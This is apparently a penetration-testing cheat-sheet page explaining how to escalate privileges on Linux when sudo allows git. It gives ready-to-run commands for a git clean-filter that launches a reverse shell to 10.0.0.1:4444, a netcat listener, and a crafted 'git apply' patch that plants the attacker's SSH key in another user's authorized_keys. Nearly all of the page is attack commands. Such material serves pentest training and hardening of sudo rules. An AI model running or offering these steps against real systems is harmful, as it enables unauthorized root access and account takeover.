Sudo Git Privilege Escalation
Sudo git is vulnerable to privilege escalation.
Git Add/Commit
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"If we can commit the git repository as root, we may be able to escalate privileges.
Exploitation
Create a Payload
echo 'bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' > /tmp/revshell
chmod +x /tmp/revshellSet Git Config
# Go to the git repository
cd /opt/example
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/revshellCommit the Repository
Before committing, we need to start a listener in local machine.
nc -lvnp 4444Then commit with sudo.
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"Now we should get a shell in local terminal.
Git Apply
sudo /usr/bin/git apply *If we can apply the patch for the git repository, we can update the content of arbitrary file.
Exploitation with SSH Keys
Assume we are currently "user1" user then we want to escalate to be "user2". First we create a new SSH key.
cd /home/user1
ssh-keygen -t rsa
Enter file in which to save the key (/home/user1/.ssh/id_rsa): id_rsaNew SSH keys (private/public) are generated under /home/user1.
Next, add the content of id_rsa.pub into authorized_keys..
cat /home/user1/id_rsa.pub > /home/user1/.ssh/authorized_keysThen create a patch.
cd /home
git diff user1/.bash_history user1/.ssh/authorized_keys > /tmp/patchAfter that, replace the name “user1” with “user2” in the patch file.
sed -i 's/user1/user2/g' /tmp/patchNow we can apply the patch as root. This command update the target user’s ("user2") authorization_keys to allow us to login with SSH key as "user2".
sudo /usr/bin/git apply /tmp/patch
ssh -i /home/user1/.ssh/id_rsa user2@example.comLast updated